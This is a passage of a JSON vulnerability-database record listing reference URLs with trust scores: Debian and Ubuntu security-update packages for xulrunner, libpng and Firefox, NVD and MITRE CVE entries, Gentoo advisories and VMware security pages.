"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_armel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_armel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_amd64.deb"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5116"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5269"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5135"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0160"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2026"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5268"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-3108"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5266"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-2445"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-0338"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5269"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5849"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-1536"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-3108"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1969"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-1536"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5266"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1664"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0338"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/glsa/glsa-201412-11.xml"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-2026"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-0720"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-2877"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5135"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0339"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-1969"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2445"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-0720"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-4995"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-5849"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-4995"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2877"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5268"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-0339"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5116"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-1664"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny4.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny4.dsc"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_armel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_hppa.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_arm.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_mipsel.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny4_all.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_s390.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_mips.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_ia64.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_alpha.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_armel.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_amd64.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_i386.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_armel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_sparc.deb"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/security/advisoiries"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0434"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0205"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0425"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-3277"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/download/player/"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/security"
},
{
"trust": 0.1,
"url": "http://downloads.vmware.com/d/info/desktop_downloads/vmware_ace/2_7"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3277"
},
{
"trust": 0.1,
"url": "http://kb.vmware.com/kb/1055"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0434"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0205"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/download/ws/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0425"
},
{
"trust": 0.1,
"url": "http://downloads.vmware.com/support/ws71/doc/releasenotes_ws712.html"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/support/policies/security_response.html"
},
{
"trust": 0.1,
"url": "http://downloads.vmware.com/support/player31/doc/releasenotes_player312.html"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/support/policies/eos.html"
},
{
"trust": 0.1,
"url": "http://downloads.vmware.com/support/ace27/doc/releasenotes_ace272.html"
},
{
"trust": 0.1,
"url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/support/policies/eos_vi.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-0360"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-0361"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-4029"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0001"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2251"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2060"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-6218"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0829"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-2042"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-3736"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-6661"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/glsa/glsa-201412-08.xml"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1000"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-2056"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-2060"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-2251"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0040"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2042"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-5907"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-6661"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-1382"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-0553"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-0946"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2056"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2529"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-4029"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0001"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1511"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3736"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1511"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2006-3005"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0436"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-0040"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0732"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-2624"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0360"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-0436"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2809"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-0553"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0732"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-2192"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-4896"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-4896"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0829"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2945"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2006-3005"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-4411"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0946"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2008-5907"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-4411"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-2624"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-0361"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-1000"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2192"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-1382"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9.2/xulrunner-1.9_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-dbg_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/x/xulrunner-1.9.2/xulrunner-1.9.2-testsuite_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-2_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-2-dom-inspector_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-3.5-branding_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.6.7+build2+nobinonly-0ubuntu0.8.04.1.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dbg_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-dbg_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-3.5-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/f/firefox/abrowser-branding_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2_1.9.2.7+build2+nobinonly.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-testsuite-dev_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.6.7+build2+nobinonly-0ubuntu0.8.04.1.dsc"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox/firefox-gnome-support-dbg_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support-dbg_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-dbg_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-gnome-support_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-dbg_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-dev_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/abrowser-3.5-branding_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/f/firefox/abrowser-branding_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_3.6.7+build2+nobinonly-0ubuntu0.10.04.1.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-2-dev_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox/firefox_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-2-dbg_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_3.6.7+build2+nobinonly-0ubuntu0.10.04.1.dsc"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-branding_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-testsuite-dev_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-gnome-support_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/abrowser-3.5_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2-dbg_1.9.2.7+build2+nobinonly-0ubuntu0.8.04.2_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/x/xulrunner-1.9.2/xulrunner-1.9.2-gnome-support_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox/firefox-dev_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/x/xulrunner-1.9.2/xulrunner-1.9.2-gnome-support_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-1.9.2_1.9.2.7+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-branding_3.6.7+build2+nobinonly-0ubuntu0.8.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
